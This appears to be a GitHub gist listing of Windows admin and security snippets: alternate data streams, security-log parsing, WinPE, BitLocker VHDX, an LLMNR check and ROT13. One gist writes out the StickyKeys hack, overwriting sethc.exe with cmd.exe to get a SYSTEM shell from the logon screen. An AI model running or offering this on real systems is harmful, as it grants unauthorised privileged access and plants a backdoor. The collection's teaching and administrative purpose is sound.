JaekelEDV / ads.ps1
Created February 8, 2022 22:31
ads playground
#Create 'normal' file with some content.
New-Item -Name .\adstest1.txt -ItemType File -Value 'This is normal content.'
#Show content...
Get-Content -Path .\adstest1.txt
#Show Alternate Data Streams - only ':$DATA'
Get-Item -Path .\adstest1.txt -Stream *
#Add ADS named SecretADS with some content
JaekelEDV / osint_links.txt
Created November 19, 2021 14:46
unsorted OSINT links
JaekelEDV / logparser.ps1
Created August 10, 2021 08:34 — forked from exp0se/logparser.ps1
Logparser log parsing
# Logparser
###############
# Security Log
###############
# Find Event id
& 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'"
#Security log
#============
####
#4624 - Logon & Logoff events successful
#4625 - Logon unsuccessful
####
# Get usernames
Get-WinEvent -path .\Security.evtx | Where {$_.id -eq "4624"} | Foreach {([xml]$_.ToXml()).GetElementsByTagName("Data").ItemOf(5)}| Select -ExpandProperty "#text" -Unique
# Get domains
JaekelEDV / mandatory_level.md
Last active May 1, 2021 14:50
mandatory_level.png
JaekelEDV / sethc.txt
Created May 1, 2021 14:42
StickyKeys/sethc-Hack
#StickyKeys/sethc-Hack
#Save sethc.exe to c:\
copy c:\windows\system32\sethc.exe c:\
#Replace sethc.exe with cmd.exe
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
#Reboot and on logon screen press SHIFT 5x -> cmd with SYSTEM-privileges
JaekelEDV / WinPEIso.txt
Created May 1, 2021 14:32
Create WinPE ISO
#Make Windows PE ISO
#https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/winpe-create-usb-bootable-drive
#01 - Install WADK
#02 - If Windows 10 > 1803 also install adkwinpesetup.exe
#https://docs.microsoft.com/en-us/windows-hardware/get-started/adk-install
#03 - Create Working directory
copype amd64 C:\WinPE_amd64
JaekelEDV / New-BitLockerVhdx.ps1
Created February 6, 2021 01:05
New-BitLockerVhdx.ps1
#New-BitLockerVhdx.ps1, create a vhdx, enable BitLocker.
#->Share encrypted data between machines (mount, attach to VMs) and peers (vhdx->Stick)
#All with Windows standard tools.
throw "Nope. This is no script, just a bunch of cmdlets."
#Create a new vhdx
New-VHD -Path .\sec.vhdx -SizeBytes 1GB -Fixed
#Mount the vhdx
JaekelEDV / Test-LLMNR.ps1
Created October 20, 2020 21:44
Test-LLMNR
#Check if LLMNR will be used.
$RegPath = "HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient"
$RegKey = Get-ItemProperty -Path $RegPath | Select-Object -Property 'EnableMulticast'
$RegValue = $RegKey.EnableMulticast
$RegCheck = Test-Path $RegPath
if ($RegCheck -eq $true) {
    Write-Host "[+]The settings of $RegPath are $RegKey" -ForegroundColor Yellow
}
if ($RegCheck -eq $false) {
JaekelEDV / ROT13.sh
Created September 17, 2020 20:32
ROT13
#https://en.wikipedia.org/wiki/ROT13
echo "Hail, Caesar!" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
#Unvy, Pnrfne!
echo "Unvy, Pnrfne!" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
#Hail, Caesar!
#To better understand this:
#tr accepts